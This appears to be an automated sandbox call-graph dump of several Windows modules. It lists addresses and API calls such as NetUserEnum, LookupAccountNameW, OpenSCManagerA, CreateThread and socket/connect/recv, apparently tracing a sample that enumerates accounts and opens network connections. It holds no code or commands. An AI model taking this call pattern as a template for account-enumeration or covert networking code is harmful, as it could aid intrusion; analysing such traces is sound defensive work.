59790->59795 59791->59788 59796 7ff8ba501547 59792->59796 59797 7ff8ba50165d 59792->59797 59793->59792 59794->59790 59795->59693 59803 7ff8ba507ab4 59795->59803 59799 7ff8ba501292 6 API calls 59796->59799 59798 7ff8ba501292 6 API calls 59797->59798 59798->59794 59800 7ff8ba501561 59799->59800 59800->59794 59801 7ff8ba5016cd 59800->59801 59802 7ff8ba501292 6 API calls 59801->59802 59802->59795 59804 7ff8ba507ad6 59803->59804 59805 7ff8ba507b19 59803->59805 59884 7ff8ba507720 59804->59884 59806 7ff8ba501292 6 API calls 59805->59806 59808 7ff8ba507aef 59806->59808 59808->59694 59813 7ff8ba503420 59808->59813 59810 7ff8ba507b49 _errno _strtoui64 _errno 59810->59808 59811 7ff8ba507b7c _errno 59810->59811 59812 7ff8ba501292 6 API calls 59811->59812 59812->59808 59926 7ff8ba509ff4 59813->59926 59849 7ff8ba502e22 59848->59849 59850 7ff8ba502dfa 59848->59850 59852 
7ff8ba501292 6 API calls 59849->59852 59851 7ff8ba501292 6 API calls 59850->59851 59853 7ff8ba502e14 59851->59853 59854 7ff8ba502e3b 59852->59854 59853->59694 59856 7ff8ba501d21 InitializeCriticalSectionAndSpinCount 59853->59856 59855 7ff8ba501292 6 API calls 59854->59855 59855->59853 59857 7ff8ba501d46 CreateThread 59856->59857 59858 7ff8ba501dc4 GetLastError 59856->59858 59859 7ff8ba501e9c GetLastError 59857->59859 59867 7ff8ba501d92 59857->59867 59860 7ff8ba501292 6 API calls 59858->59860 59861 7ff8ba501292 6 API calls 59859->59861 59863 7ff8ba501d9f 59860->59863 59861->59867 59862 7ff8ba501f95 59864 7ff8ba501292 6 API calls 59862->59864 59865 7ff8ba501dbc 59863->59865 59864->59865 59865->59694 59867->59862 59867->59863 59885 7ff8ba507731 59884->59885 59886 7ff8ba507769 59884->59886 59892 7ff8ba507409 59885->59892 59887 7ff8ba501292 6 API calls 59886->59887 59891 7ff8ba507748 59887->59891 59891->59808 59891->59810 59893 7ff8ba507421 59892->59893 59894 7ff8ba50743c 59892->59894 59896 7ff8ba507426 59893->59896 59897 7ff8ba50746f 59893->59897 59895 7ff8ba501292 6 API calls 59894->59895 59903 7ff8ba507465 59895->59903 59898 7ff8ba5074a2 59896->59898 59907 7ff8ba50742b 59896->59907 59899 7ff8ba501292 6 API calls 59897->59899 59900 7ff8ba501292 6 API calls 59898->59900 59899->59903 59900->59903 59901 7ff8ba50750c 59901->59903 59906 7ff8ba501292 6 API calls 59903->59906 59904 7ff8ba5074e1 strcmp 59904->59907 59908 7ff8ba507529 59906->59908 59907->59901 59907->59904 59908->59891 59927 7ff8ba50a02b 59926->59927 59928 7ff8ba50a002 LoadLibraryA 59926->59928 59929 7ff8ba50a02e GetLastError 59927->59929 59928->59929 59930 7ff8ba50a010 59928->59930 59932 7ff8ba501292 6 API calls 59929->59932 59931 7ff8ba501292 6 API calls 59930->59931 59933 7ff8ba503434 59931->59933 59932->59933 59970 7ff8b918146a 59969->59970 59971 7ff8b9181590 GetLastError 59969->59971 60094 7ff8b9181770 GetModuleHandleExA 59970->60094 59973 7ff8b9181292 6 API calls 59971->59973 59980 7ff8b9181569 
59973->59980 59977 7ff8b91814a4 strlen 59978 7ff8b91814bd 59977->59978 59979 7ff8b91814d3 59977->59979 59978->59979 59983 7ff8b91814c2 strlen 59978->59983 59984 7ff8b91814f8 strlen fopen 59979->59984 59985 7ff8b91814d8 strcat strlen 59979->59985 59981 7ff8b9181292 6 API calls 59980->59981 59982 7ff8b9181586 59981->59982 59982->59706 59993 7ff8b9189004 59982->59993 59983->59979 59986 7ff8b918165d 59984->59986 59987 7ff8b9181547 59984->59987 59985->59984 59988 7ff8b9181292 6 API calls 59986->59988 60111 7ff8b9181292 59987->60111 59988->59980 59994 7ff8b9189026 59993->59994 59995 7ff8b9189069 59993->59995 60131 7ff8b9188c70 59994->60131 59996 7ff8b9181292 6 API calls 59995->59996 60001 7ff8b9188491 59996->60001 59999 7ff8b9189099 _errno _strtoui64 _errno 60000 7ff8b91890cc _errno 59999->60000 59999->60001 60002 7ff8b9181292 6 API calls 60000->60002 60001->59719 60003 7ff8b918e870 60001->60003 60002->60001 60173 7ff8b9181aa4 60003->60173 60039 7ff8b91849da OpenSCManagerA 60038->60039 60040 7ff8b9184a42 GetLastError 60038->60040 60041 7ff8b9184b1a GetLastError 60039->60041 60042 7ff8b9184a10 60039->60042 60043 7ff8b9181292 6 API calls 60040->60043 60046 7ff8b9181292 6 API calls 60041->60046 60044 7ff8b9184b36 60042->60044 60045 7ff8b9184a1d 60042->60045 60043->60045 60047 7ff8b9181292 6 API calls 60044->60047 60048 7ff8b9181292 6 API calls 60045->60048 60046->60044 60049 7ff8b9184a3a 60047->60049 60048->60049 60049->59719 60050 7ff8b918595e WSAStartup 60049->60050 60051 7ff8b918597a 60050->60051 60052 7ff8b91859a2 60050->60052 60053 7ff8b9181292 6 API calls 60051->60053 60054 7ff8b9181292 6 API calls 60052->60054 60095 7ff8b9181486 60094->60095 60096 7ff8b91817a2 GetLastError 60094->60096 60098 7ff8b918e0f1 60095->60098 60097 7ff8b9181292 6 API calls 60096->60097 60097->60095 60099 7ff8b918e102 60098->60099 60100 7ff8b918e138 60098->60100 60101 7ff8b918e107 60099->60101 60102 7ff8b918e168 60099->60102 60103 7ff8b9181292 6 API calls 60100->60103 60106 7ff8b918e110 
60101->60106 60107 7ff8b918e198 60101->60107 60105 7ff8b9181292 6 API calls 60102->60105 60104 7ff8b918149a 60103->60104 60104->59977 60104->59980 60105->60104 60122 7ff8b918dfb2 8 API calls 60106->60122 60108 7ff8b9181292 6 API calls 60107->60108 60108->60104 60110 7ff8b918e115 60110->60104 60112 7ff8b91812a0 60111->60112 60123 7ff8b9190c10 60112->60123 60122->60110 60132 7ff8b9188c81 60131->60132 60133 7ff8b9188cb9 60131->60133 60139 7ff8b9188959 60132->60139 60135 7ff8b9181292 6 API calls 60133->60135 60138 7ff8b9188c98 60135->60138 60138->59999 60138->60001 60140 7ff8b9188971 60139->60140 60141 7ff8b918898c 60139->60141 60142 7ff8b9188976 60140->60142 60143 7ff8b91889bf 60140->60143 60144 7ff8b9181292 6 API calls 60141->60144 60145 7ff8b91889f2 60142->60145 60152 7ff8b918897b 60142->60152 60146 7ff8b9181292 6 API calls 60143->60146 60151 7ff8b91889b5 60144->60151 60147 7ff8b9181292 6 API calls 60145->60147 60146->60151 60147->60151 60148 7ff8b9188a5c 60148->60151 60149 7ff8b9188a31 strcmp 60149->60152 60154 7ff8b9181292 6 API calls 60151->60154 60152->60148 60152->60149 60174 7ff8b9181adb 60173->60174 60175 7ff8b9181ab2 LoadLibraryA 60173->60175 60176 7ff8b9181ade GetLastError 60174->60176 60175->60176 60177 7ff8b9181ac0 60175->60177 60179 7ff8b9181292 6 API calls 60176->60179 60178 7ff8b9181292 6 API calls 60177->60178 60180 7ff8b9181ad9 60178->60180 60179->60180 60217 7ff8bfb531aa 60216->60217 60218 7ff8bfb532d0 GetLastError 60216->60218 60321 7ff8bfb51e40 GetModuleHandleExA 60217->60321 60220 7ff8bfb52fd2 6 API calls 60218->60220 60228 7ff8bfb532a9 60220->60228 60224 7ff8bfb531e4 strlen 60226 7ff8bfb531fd 60224->60226 60227 7ff8bfb53213 60224->60227 60225 7ff8bfb52fd2 6 API calls 60239 7ff8bfb532c6 60225->60239 60226->60227 60229 7ff8bfb53202 strlen 60226->60229 60230 7ff8bfb53238 strlen fopen 60227->60230 60231 7ff8bfb53218 strcat strlen 60227->60231 60228->60225 60229->60227 60232 7ff8bfb5339d 60230->60232 60233 7ff8bfb53287 60230->60233 60231->60230 60234 
7ff8bfb52fd2 6 API calls 60232->60234 60338 7ff8bfb52fd2 60233->60338 60234->60228 60239->59723 60240 7ff8bfb58ab4 60239->60240 60241 7ff8bfb58b19 60240->60241 60242 7ff8bfb58ad6 60240->60242 60243 7ff8bfb52fd2 6 API calls 60241->60243 60358 7ff8bfb58720 60242->60358 60245 7ff8bfb53501 60243->60245 60245->59724 60250 7ff8bfb54430 60245->60250 60247 7ff8bfb58b49 _errno _strtoui64 _errno 60247->60245 60248 7ff8bfb58b7c _errno 60247->60248 60249 7ff8bfb52fd2 6 API calls 60248->60249 60249->60245 60400 7ff8bfb52174 60250->60400 60286 7ff8bfb52f3a 60285->60286 60287 7ff8bfb52f62 60285->60287 60288 7ff8bfb52fd2 6 API calls 60286->60288 60289 7ff8bfb52fd2 6 API calls 60287->60289 60290 7ff8bfb52f54 60288->60290 60291 7ff8bfb52f7b 60289->60291 60290->59729 60292 7ff8bfb52fd2 6 API calls 60291->60292 60292->60290 60294 7ff8bfb53bc4 GetLastError 60293->60294 60295 7ff8bfb53b46 CreateThread 60293->60295 60297 7ff8bfb52fd2 6 API calls 60294->60297 60296 7ff8bfb53c9c GetLastError 60295->60296 60304 7ff8bfb53b92 60295->60304 60298 7ff8bfb52fd2 6 API calls 60296->60298 60303 7ff8bfb53b9f 60297->60303 60298->60304 60299 7ff8bfb53d95 60304->60299 60304->60303 60322 7ff8bfb51e68 60321->60322 60323 7ff8bfb51e72 GetLastError 60321->60323 60325 7ff8bfb57dd1 60322->60325 60324 7ff8bfb52fd2 6 API calls 60323->60324 60324->60322 60326 7ff8bfb57e18 60325->60326 60327 7ff8bfb57de2 60325->60327 60330 7ff8bfb52fd2 6 API calls 60326->60330 60328 7ff8bfb57e48 60327->60328 60329 7ff8bfb57de7 60327->60329 60333 7ff8bfb52fd2 6 API calls 60328->60333 60331 7ff8bfb57e78 60329->60331 60332 7ff8bfb57df0 60329->60332 60336 7ff8bfb531da 60330->60336 60334 7ff8bfb52fd2 6 API calls 60331->60334 60349 7ff8bfb57c92 8 API calls 60332->60349 60333->60336 60334->60336 60336->60224 60336->60228 60337 7ff8bfb57df5 60337->60336 60339 7ff8bfb52fe0 60338->60339 60350 7ff8bfb5d190 60339->60350 60349->60337 60351 7ff8bfb5d19e 60350->60351 60352 7ff8bfb5d1b5 60350->60352 60359 7ff8bfb58769 60358->60359 60360 
7ff8bfb58731 60358->60360 60362 7ff8bfb52fd2 6 API calls 60359->60362 60366 7ff8bfb58409 60360->60366 60364 7ff8bfb58748 60362->60364 60364->60245 60364->60247 60367 7ff8bfb5843c 60366->60367 60368 7ff8bfb58421 60366->60368 60371 7ff8bfb52fd2 6 API calls 60367->60371 60369 7ff8bfb5846f 60368->60369 60370 7ff8bfb58426 60368->60370 60372 7ff8bfb52fd2 6 API calls 60369->60372 60373 7ff8bfb584a2 60370->60373 60380 7ff8bfb5842b 60370->60380 60376 7ff8bfb58465 60371->60376 60372->60376 60374 7ff8bfb52fd2 6 API calls 60373->60374 60374->60376 60375 7ff8bfb5850c 60375->60376 60379 7ff8bfb52fd2 6 API calls 60376->60379 60377 7ff8bfb584e1 strcmp 60377->60380 60380->60375 60380->60377 60401 7ff8bfb521ab 60400->60401 60402 7ff8bfb52182 LoadLibraryA 60400->60402 60403 7ff8bfb521ae GetLastError 60401->60403 60402->60403 60404 7ff8bfb52190 60402->60404 60405 7ff8bfb52fd2 6 API calls 60403->60405 60406 7ff8bfb52fd2 6 API calls 60404->60406 60444 7ff8b915146a 60443->60444 60445 7ff8b9151590 GetLastError 60443->60445 60556 7ff8b915cc60 GetModuleHandleExA 60444->60556 60447 7ff8b9151292 6 API calls 60445->60447 60452 7ff8b9151569 60447->60452 60451 7ff8b91514a4 strlen 60454 7ff8b91514bd 60451->60454 60455 7ff8b91514d3 60451->60455 60453 7ff8b9151292 6 API calls 60452->60453 60466 7ff8b9151586 60453->60466 60454->60455 60456 7ff8b91514c2 strlen 60454->60456 60457 7ff8b91514f8 strlen fopen 60455->60457 60458 7ff8b91514d8 strcat strlen 60455->60458 60456->60455 60459 7ff8b915165d 60457->60459 60460 7ff8b9151547 60457->60460 60458->60457 60462 7ff8b9151292 6 API calls 60459->60462 60573 7ff8b9151292 60460->60573 60462->60452 60466->59736 60467 7ff8b915c974 60466->60467 60468 7ff8b915c9d9 60467->60468 60469 7ff8b915c996 60467->60469 60471 7ff8b9151292 6 API calls 60468->60471 60593 7ff8b915c5e0 60469->60593 60476 7ff8b915be11 60471->60476 60473 7ff8b915ca09 _errno _strtoui64 _errno 60474 7ff8b915ca3c _errno 60473->60474 60473->60476 60475 7ff8b9151292 6 API calls 60474->60475 60475->60476 
60476->59747 60477 7ff8b9159770 60476->60477 60635 7ff8b915cf94 60477->60635 60513 7ff8b9152dfa 60512->60513 60514 7ff8b9152e22 60512->60514 60515 7ff8b9151292 6 API calls 60513->60515 60516 7ff8b9151292 6 API calls 60514->60516 60517 7ff8b9152e14 60515->60517 60518 7ff8b9152e3b 60516->60518 60517->59747 60520 7ff8b9155a84 InitializeCriticalSectionAndSpinCount 60517->60520 60519 7ff8b9151292 6 API calls 60518->60519 60519->60517 60521 7ff8b9155a9f 60520->60521 60522 7ff8b9155ad4 GetLastError 60520->60522 60523 7ff8b9151292 6 API calls 60521->60523 60524 7ff8b9151292 6 API calls 60522->60524 60525 7ff8b9155ac7 60523->60525 60526 7ff8b9155af2 60524->60526 60525->59747 60557 7ff8b9151486 60556->60557 60558 7ff8b915cc92 GetLastError 60556->60558 60560 7ff8b9158ff1 60557->60560 60559 7ff8b9151292 6 API calls 60558->60559 60559->60557 60561 7ff8b9159038 60560->60561 60562 7ff8b9159002 60560->60562 60565 7ff8b9151292 6 API calls 60561->60565 60563 7ff8b9159068 60562->60563 60564 7ff8b9159007 60562->60564 60568 7ff8b9151292 6 API calls 60563->60568 60566 7ff8b9159098 60564->60566 60567 7ff8b9159010 60564->60567 60571 7ff8b915149a 60565->60571 60569 7ff8b9151292 6 API calls 60566->60569 60584 7ff8b9158eb2 8 API calls 60567->60584 60568->60571 60569->60571 60571->60451 60571->60452 60572 7ff8b9159015 60572->60571 60574 7ff8b91512a0 60573->60574 60585 7ff8b915f010 60574->60585 60584->60572 60586 7ff8b915f01e 60585->60586 60587 7ff8b915f035 60585->60587 60594 7ff8b915c629 60593->60594 60595 7ff8b915c5f1 60593->60595 60597 7ff8b9151292 6 API calls 60594->60597 60601 7ff8b915c2c9 60595->60601 60598 7ff8b915c608 60597->60598 60598->60473 60598->60476 60602 7ff8b915c2fc 60601->60602 60603 7ff8b915c2e1 60601->60603 60606 7ff8b9151292 6 API calls 60602->60606 60604 7ff8b915c32f 60603->60604 60605 7ff8b915c2e6 60603->60605 60608 7ff8b9151292 6 API calls 60604->60608 60607 7ff8b915c362 60605->60607 60615 7ff8b915c2eb 60605->60615 60611 7ff8b915c325 60606->60611 60609 7ff8b9151292 6 
API calls 60607->60609 60608->60611 60609->60611 60610 7ff8b915c3cc 60610->60611 60613 7ff8b915c3d3 60610->60613 60614 7ff8b9151292 6 API calls 60611->60614 60612 7ff8b915c3a1 strcmp 60612->60615 60617 7ff8b915c3e9 60614->60617 60615->60610 60615->60612 60617->60598 60636 7ff8b915cfcb 60635->60636 60637 7ff8b915cfa2 LoadLibraryA 60635->60637 60638 7ff8b915cfce GetLastError 60636->60638 60637->60638 60639 7ff8b915cfb0 60637->60639 60641 7ff8b9151292 6 API calls 60638->60641 60640 7ff8b9151292 6 API calls 60639->60640 60679 7ff8bfaba500 GetLastError 60678->60679 60680 7ff8bfaba3da 60678->60680 60682 7ff8bfaba202 6 API calls 60679->60682 60786 7ff8bfab7140 GetModuleHandleExA 60680->60786 60690 7ff8bfaba4d9 60682->60690 60686 7ff8bfaba414 strlen 60687 7ff8bfaba443 60686->60687 60688 7ff8bfaba42d 60686->60688 60693 7ff8bfaba468 strlen fopen 60687->60693 60694 7ff8bfaba448 strcat strlen 60687->60694 60688->60687 60691 7ff8bfaba432 strlen 60688->60691 60689 7ff8bfaba202 6 API calls 60692 7ff8bfaba4f6 60689->60692 60690->60689 60691->60687 60692->59755 60702 7ff8bfab94f4 60692->60702 60695 7ff8bfaba4b7 60693->60695 60696 7ff8bfaba5cd 60693->60696 60694->60693 60698 7ff8bfaba202 6 API calls 60695->60698 60697 7ff8bfaba202 6 API calls 60696->60697 60697->60690 60699 7ff8bfaba4d1 60698->60699 60699->60690 60700 7ff8bfaba63d 60699->60700 60701 7ff8bfaba202 6 API calls 60700->60701 60701->60692 60703 7ff8bfab9516 60702->60703 60704 7ff8bfab9559 60702->60704 60804 7ff8bfab9160 60703->60804 60705 7ff8bfaba202 6 API calls 60704->60705 60707 7ff8bfab952f 60705->60707 60707->59758 60712 7ff8bfab2610 60707->60712 60709 7ff8bfab9589 _errno _strtoui64 _errno 60709->60707 60710 7ff8bfab95bc _errno 60709->60710 60711 7ff8bfaba202 6 API calls 60710->60711 60711->60707 60846 7ff8bfab7474 60712->60846 60748 7ff8bfab2012 60747->60748 60749 7ff8bfab1fea 60747->60749 60751 7ff8bfaba202 6 API calls 60748->60751 60750 7ff8bfaba202 6 API calls 60749->60750 60753 7ff8bfab2004 60750->60753 60752 
7ff8bfab202b 60751->60752 60754 7ff8bfaba202 6 API calls 60752->60754 60753->59756 60754->60753 60756 7ff8bfab696a InitializeCriticalSectionAndSpinCount 60755->60756 60757 7ff8bfab6aec GetLastError 60755->60757 60758 7ff8bfab6997 60756->60758 60759 7ff8bfab6c08 GetLastError 60756->60759 60760 7ff8bfaba202 6 API calls 60757->60760 60761 7ff8bfab69ad CreateThread 60758->60761 60766 7ff8bfab6c26 60758->60766 60787 7ff8bfab7172 GetLastError 60786->60787 60788 7ff8bfab7168 60786->60788 60789 7ff8bfaba202 6 API calls 60787->60789 60790 7ff8bfab5fb1 60788->60790 60789->60788 60791 7ff8bfab5fc2 60790->60791 60792 7ff8bfab5ff8 60790->60792 60793 7ff8bfab5fc7 60791->60793 60794 7ff8bfab6028 60791->60794 60795 7ff8bfaba202 6 API calls 60792->60795 60797 7ff8bfab5fd0 60793->60797 60798 7ff8bfab6058 60793->60798 60796 7ff8bfaba202 6 API calls 60794->60796 60801 7ff8bfab5fdd 60795->60801 60796->60801 60803 7ff8bfab5e72 8 API calls 60797->60803 60799 7ff8bfaba202 6 API calls 60798->60799 60799->60801 60801->60686 60801->60690 60802 7ff8bfab5fd5 60802->60801 60803->60802 60805 7ff8bfab9171 60804->60805 60806 7ff8bfab91a9 60804->60806 60812 7ff8bfab8e49 60805->60812 60807 7ff8bfaba202 6 API calls 60806->60807 60809 7ff8bfab9188 60807->60809 60809->60707 60809->60709 60813 7ff8bfab8e61 60812->60813 60814 7ff8bfab8e7c 60812->60814 60815 7ff8bfab8e66 60813->60815 60816 7ff8bfab8eaf 60813->60816 60817 7ff8bfaba202 6 API calls 60814->60817 60818 7ff8bfab8ee2 60815->60818 60826 7ff8bfab8e6b 60815->60826 60819 7ff8bfaba202 6 API calls 60816->60819 60822 7ff8bfab8ea5 60817->60822 60820 7ff8bfaba202 6 API calls 60818->60820 60819->60822 60820->60822 60821 7ff8bfab8f4c 60821->60822 60824 7ff8bfab8f53 60821->60824 60825 7ff8bfaba202 6 API calls 60822->60825 60823 7ff8bfab8f21 strcmp 60823->60826 60828 7ff8bfab8f69 60825->60828 60826->60821 60826->60823 60828->60809 60847 7ff8bfab7482 LoadLibraryA 60846->60847 60848 7ff8bfab74ab 60846->60848 60849 7ff8bfab7490 60847->60849 60850 7ff8bfab74ae 
GetLastError 60847->60850 60848->60850 60852 7ff8bfaba202 6 API calls 60849->60852 60851 7ff8bfaba202 6 API calls 60850->60851 60853 7ff8bfab2624 60851->60853 60852->60853 60890 7ff8bfb8146a 60889->60890 60891 7ff8bfb81590 GetLastError 60889->60891 61005 7ff8bfb84170 GetModuleHandleExA 60890->61005 60892 7ff8bfb81292 19 API calls 60891->60892 60901 7ff8bfb81569 60892->60901 60897 7ff8bfb814a4 strlen 60899 7ff8bfb814bd 60897->60899 60900 7ff8bfb814d3 60897->60900 60898 7ff8bfb81292 19 API calls 60902 7ff8bfb81586 60898->60902 60899->60900 60903 7ff8bfb814c2 strlen 60899->60903 60904 7ff8bfb814f8 strlen fopen 60900->60904 60905 7ff8bfb814d8 strcat strlen 60900->60905 60901->60898 60902->59762 60913 7ff8bfb8ca74 60902->60913 60903->60900 60906 7ff8bfb8165d 60904->60906 60907 7ff8bfb81547 60904->60907 60905->60904 60909 7ff8bfb81292 19 API calls 60906->60909 60908 7ff8bfb81292 19 API calls 60907->60908 60910 7ff8bfb81561 60908->60910 60909->60901 60910->60901 60911 7ff8bfb816cd 60910->60911 60914 7ff8bfb8ca96 60913->60914 60915 7ff8bfb8cad9 60913->60915 61023 7ff8bfb8c6e0 60914->61023 60916 7ff8bfb81292 19 API calls 60915->60916 60922 7ff8bfb84587 60916->60922 60919 7ff8bfb8cb09 _errno _strtoui64 _errno 60920 7ff8bfb8cb3c _errno 60919->60920 60919->60922 60921 7ff8bfb81292 19 API calls 60920->60921 60921->60922 60922->59764 60923 7ff8bfb84bc0 60922->60923 61065 7ff8bfb844a4 60923->61065 60957 7ff8bfb824ca 60956->60957 60958 7ff8bfb824f2 60956->60958 60959 7ff8bfb81292 19 API calls 60957->60959 60960 7ff8bfb81292 19 API calls 60958->60960 60961 7ff8bfb824e4 60959->60961 60962 7ff8bfb8250b 60960->60962 60961->59768 60963 7ff8bfb81292 19 API calls 60962->60963 60963->60961 60965 7ff8bfb8a084 GetLastError 60964->60965 60966 7ff8bfb8a006 CreateThread 60964->60966 60967 7ff8bfb81292 19 API calls 60965->60967 60968 7ff8bfb8a052 60966->60968 60969 7ff8bfb8a15c GetLastError 60966->60969 60972 7ff8bfb8a05f 60967->60972 60971 7ff8bfb8a255 60968->60971 60968->60972 60970 
7ff8bfb81292 19 API calls 60969->60970 60970->60972 61006 7ff8bfb81486 61005->61006 61007 7ff8bfb841a2 GetLastError 61005->61007 61009 7ff8bfb88571 61006->61009 61008 7ff8bfb81292 19 API calls 61007->61008 61008->61006 61010 7ff8bfb88582 61009->61010 61011 7ff8bfb885b8 61009->61011 61013 7ff8bfb88587 61010->61013 61014 7ff8bfb885e8 61010->61014 61012 7ff8bfb81292 19 API calls 61011->61012 61020 7ff8bfb8149a 61012->61020 61016 7ff8bfb88590 61013->61016 61017 7ff8bfb88618 61013->61017 61015 7ff8bfb81292 19 API calls 61014->61015 61015->61020 61022 7ff8bfb88432 21 API calls 61016->61022 61018 7ff8bfb81292 19 API calls 61017->61018 61018->61020 61020->60897 61020->60901 61021 7ff8bfb88595 61021->61020 61022->61021 61024 7ff8bfb8c6f1 61023->61024 61025 7ff8bfb8c729 61023->61025 61031 7ff8bfb8c3c9 61024->61031 61026 7ff8bfb81292 19 API calls 61025->61026 61030 7ff8bfb8c708 61026->61030 61030->60919 61030->60922 61032 7ff8bfb8c3e1 61031->61032 61033 7ff8bfb8c3fc 61031->61033 61034 7ff8bfb8c3e6 61032->61034 61035 7ff8bfb8c42f 61032->61035 61036 7ff8bfb81292 19 API calls 61033->61036 61038 7ff8bfb8c462 61034->61038 61045 7ff8bfb8c3eb 61034->61045 61037 7ff8bfb81292 19 API calls 61035->61037 61041 7ff8bfb8c425 61036->61041 61037->61041 61039 7ff8bfb81292 19 API calls 61038->61039 61039->61041 61040 7ff8bfb8c4cc 61040->61041 61044 7ff8bfb81292 19 API calls 61041->61044 61042 7ff8bfb8c4a1 strcmp 61042->61045 61045->61040 61045->61042 61066 7ff8bfb844db 61065->61066 61067 7ff8bfb844b2 LoadLibraryA 61065->61067 61068 7ff8bfb844de GetLastError 61066->61068 61067->61068 61069 7ff8bfb844c0 61067->61069 61070 7ff8bfb81292 19 API calls 61068->61070 61071 7ff8bfb81292 19 API calls 61069->61071 61072 7ff8bfb844d9 61070->61072 61071->61072 61203 7ff70887ab1e 61202->61203 61204 7ff70887ab35 61202->61204 61208 7ff70887bb4b fputc 61203->61208 61209 7ff70887bb4b fputc 61204->61209 61207 7ff708879a49 61207->59250 61207->59251 61207->59252 61208->61207 61209->61207 61210 7ff8b9153c88 61250 
7ff8b91538c3 61210->61250 61211 7ff8b9153cd7 wcslen GetProcessHeap HeapAlloc 61211->61250 61212 7ff8b9153d97 NetApiBufferFree 61216 7ff8b9153d87 61212->61216 61213 7ff8b9153d48 GetProcessHeap HeapAlloc 61217 7ff8b9153d6c 61213->61217 61213->61250 61214 7ff8b9151292 6 API calls 61214->61250 61215 7ff8b9153ed7 61221 7ff8b9151292 6 API calls 61215->61221 61237 7ff8b9153ee0 61215->61237 61216->61212 61216->61215 61218 7ff8b9153dba NetUserEnum 61216->61218 61225 7ff8b9153e36 GetProcessHeap HeapAlloc 61216->61225 61219 7ff8b9151292 6 API calls 61217->61219 61217->61250 61218->61216 61219->61217 61220 7ff8b9154014 61223 7ff8b9151292 6 API calls 61220->61223 61221->61237 61222 7ff8b91538ee LocalAlloc 61222->61250 61229 7ff8b9153f0a 61223->61229 61226 7ff8b9153e70 61225->61226 61227 7ff8b91538a3 61225->61227 61231 7ff8b9153e7c memcpy GetProcessHeap HeapFree 61226->61231 61232 7ff8b9153eb5 61226->61232 61227->61216 61234 7ff8b9151292 6 API calls 61227->61234 61228 7ff8b915390d wcsncpy 61251 7ff8b915a05a 61228->61251 61231->61232 61234->61227 61235 7ff8b9151292 6 API calls 61235->61229 61237->61220 61238 7ff8b9153ee8 61237->61238 61254 7ff8b915379f 61238->61254 61239 7ff8b91539de GetLastError 61242 7ff8b9153a01 LocalAlloc 61239->61242 61239->61250 61240 7ff8b9153b84 ConvertSidToStringSidA 61245 7ff8b9153bd5 GetLastError 61240->61245 61240->61250 61241 7ff8b9153995 GetLastError 61244 7ff8b9151292 6 API calls 61241->61244 61243 7ff8b9153a1f LookupAccountNameW 61242->61243 61242->61250 61246 7ff8b9153a61 GetLastError 61243->61246 61247 7ff8b9153a53 LocalFree 61243->61247 61244->61250 61248 7ff8b9151292 6 API calls 61245->61248 61249 7ff8b9151292 6 API calls 61246->61249 61247->61250 61248->61250 61249->61250 61250->61211 61250->61213 61250->61214 61250->61216 61250->61222 61250->61228 61250->61240 61250->61241 61250->61247 61252 7ff8b915a082 wcslen 61251->61252 61253 7ff8b9153937 LookupAccountNameW 61251->61253 61252->61253 61253->61239 61253->61250 61255 7ff8b9153864 
61254->61255 61256 7ff8b91537b2 61254->61256 61255->61229 61255->61235 61257 7ff8b9153841 61256->61257 61259 7ff8b91537e7 GetProcessHeap HeapFree 61256->61259 61260 7ff8b915380c GetProcessHeap HeapFree 61256->61260 61261 7ff8b9153831 LocalFree 61256->61261 61262 7ff8b9153839 LocalFree 61256->61262 61257->61255 61258 7ff8b915384d GetProcessHeap HeapFree 61257->61258 61258->61255 61259->61256 61260->61256 61261->61256 61262->61256 61263 7ff8b915184a 61272 7ff8b9151855 61263->61272 61264 7ff8b915195e 61265 7ff8b915196b 61264->61265 61330 7ff8b91522d5 10 API calls 61264->61330 61266 7ff8b915187d Sleep 61266->61272 61270 7ff8b9151932 Sleep 61270->61272 61271 7ff8b91522d5 10 API calls 61271->61272 61272->61264 61272->61266 61272->61270 61272->61271 61274 7ff8b915191e memcpy 61272->61274 61275 7ff8b915256c socket 61272->61275 61310 7ff8b9152a1a 61272->61310 61321 7ff8b9151780 61272->61321 61274->61272 61276 7ff8b915276b WSAGetLastError 61275->61276 61277 7ff8b91525a3 61275->61277 61280 7ff8b9151292 6 API calls 61276->61280 61278 7ff8b91525c5 61277->61278 61279 7ff8b91525a7 61277->61279 61283 7ff8b9152209 8 API calls 61278->61283 61331 7ff8b9152209 61279->61331 61282 7ff8b915278f 61280->61282 61285 7ff8b9152799 61282->61285 61286 7ff8b91525df 61282->61286 61287 7ff8b91525c3 61283->61287 61289 7ff8b9151292 6 API calls 61285->61289 61290 7ff8b9151292 6 API calls 61286->61290 61308 7ff8b91525d7 61287->61308 61344 7ff8b915233a setsockopt 61287->61344 61288 7ff8b915261e 61292 7ff8b9152623 htonl htons connect 61288->61292 61288->61308 61294 7ff8b9152600 61289->61294 61290->61294 61296 7ff8b915267c WSAGetLastError 61292->61296 61297 7ff8b9152661 61292->61297 61294->61272 61299 7ff8b915268d 61296->61299 61300 7ff8b915273e WSAGetLastError 61296->61300 61298 7ff8b9152209 8 API calls 61297->61298 61302 7ff8b915266e 61298->61302 61303 7ff8b9152695 select 61299->61303 61299->61308 61301 7ff8b9151292 6 API calls 61300->61301 61301->61308 61302->61282 61302->61308 61304 7ff8b91526f6 
61303->61304 61305 7ff8b9152720 61303->61305 61304->61297 61306 7ff8b91526fc WSAGetLastError 61304->61306 61307 7ff8b9151292 6 API calls 61305->61307 61309 7ff8b9151292 6 API calls 61306->61309 61307->61308 61348 7ff8b91522d5 10 API calls 61308->61348 61309->61308 61311 7ff8b9152aa8 61310->61311 61312 7ff8b9152a34 61310->61312 61313 7ff8b9151292 6 API calls 61311->61313 61312->61311 61314 7ff8b9152a39 recv 61312->61314 61317 7ff8b9152a53 61313->61317 61315 7ff8b9152a5c WSAGetLastError 61314->61315 61316 7ff8b9152a4f 61314->61316 61315->61317 61318 7ff8b9152a70 61315->61318 61316->61317 61320 7ff8b9151292 6 API calls 61316->61320 61317->61272 61319 7ff8b9151292 6 API calls 61318->61319 61319->61317 61320->61317 61322 7ff8b9151798 61321->61322 61323 7ff8b9151842 61321->61323 61322->61323 61349 7ff8b915a000 61322->61349 61323->61272 61326 7ff8b9151834 LeaveCriticalSection 61326->61323 61327 7ff8b91517c8 61327->61326 61328 7ff8b9151292 6 API calls 61327->61328 61352 7ff8b915e342 61327->61352 61328->61327 61330->61265 61332 7ff8b9152219 ioctlsocket 61331->61332 61334 7ff8b915224d WSAGetLastError 61332->61334 61336 7ff8b915223c 61332->61336 61335 7ff8b9151292 6 API calls 61334->61335 61335->61336 61336->61288 61337 7ff8b9152154 setsockopt 61336->61337 61338 7ff8b9152189 setsockopt 61337->61338 61339 7ff8b91521e4 WSAGetLastError 61337->61339 61340 7ff8b91521bf 